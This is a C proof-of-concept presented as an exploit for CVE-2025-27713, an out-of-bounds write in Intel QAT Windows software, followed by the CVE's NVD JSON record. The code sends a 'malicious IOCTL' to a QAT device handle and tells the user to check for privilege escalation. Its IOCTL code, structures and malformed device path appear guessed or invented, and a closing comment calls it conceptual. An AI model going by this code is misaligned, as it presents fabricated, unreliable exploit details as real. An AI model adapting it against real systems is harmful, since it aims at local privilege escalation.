CVE-2025-27713

// CVE-2025-27713 PoC - Intel QAT Out-of-bounds Write // This PoC demonstrates the vulnerability in Intel QAT Windows software // Target: Intel QAT < 2.6.0 #include <windows.h> #include <stdio.h> #include <stdlib.h> // QAT driver IOCTL codes #define QAT_IOCTL_BASE 0x8000 #define QAT_IOCTL_VULN (QAT_IOCTL_BASE + 0x1) typedef struct _QAT_BUFFER { PVOID Address; ULONG Length; } QAT_BUFFER, *PQAT_BUFFER; typedef struct _QAT_VULN_INPUT { ULONG Size; PVOID UserBuffer; ULONG OperationType; } QAT_VULN_INPUT, *PQAT_VULN_INPUT; int main() { HANDLE hDevice; QAT_VULN_INPUT input; DWORD bytesReturned = 0; BOOL result; printf("[*] CVE-2025-27713 PoC - Intel QAT Out-of-bounds Write\n"); printf("[*] Target: Intel QAT Windows software < 2.6.0\n"); // Open QAT driver handle hDevice = CreateFile( "\\\\\\.\\QATDriver", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open QAT driver\n"); return 1; } printf("[+] QAT driver handle obtained\n"); // Prepare malicious input to trigger out-of-bounds write input.Size = 0x1000; input.UserBuffer = VirtualAlloc(NULL, 0x2000, MEM_COMMIT, PAGE_READWRITE); if (!input.UserBuffer) { printf("[-] Failed to allocate memory\n"); CloseHandle(hDevice); return 1; } // Fill buffer with trigger pattern memset(input.UserBuffer, 0x41, 0x1000); input.OperationType = 0x1337; // Trigger specific code path printf("[*] Sending malicious IOCTL request...\n"); // Trigger vulnerable code path result = DeviceIoControl( hDevice, QAT_IOCTL_VULN, &input, sizeof(QAT_VULN_INPUT), NULL, 0, &bytesReturned, NULL ); if (result) { printf("[+] IOCTL request sent - check for privilege escalation\n"); } else { printf("[-] IOCTL request failed\n"); } VirtualFree(input.UserBuffer, 0, MEM_RELEASE); CloseHandle(hDevice); return 0; } // Note: This is a conceptual PoC. Actual exploitation requires: // 1. Valid authentication as low-privilege user // 2. Specific knowledge of QAT driver internals // 3. Precise memory layout manipulation // 4. High attack complexity (as per CVSS vector)

{"cve": {"id": "CVE-2025-27713", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:45.940", "lastModified": "2025-11-26T15:40:36.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write for some Intel(R) QAT Windows software before version 2.6.0. within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*", "versionEndExcluding": "2.6.0-0018", "matchCriteriaId": "6416303E-851F-4530-875E-D349969919BE"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01373.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}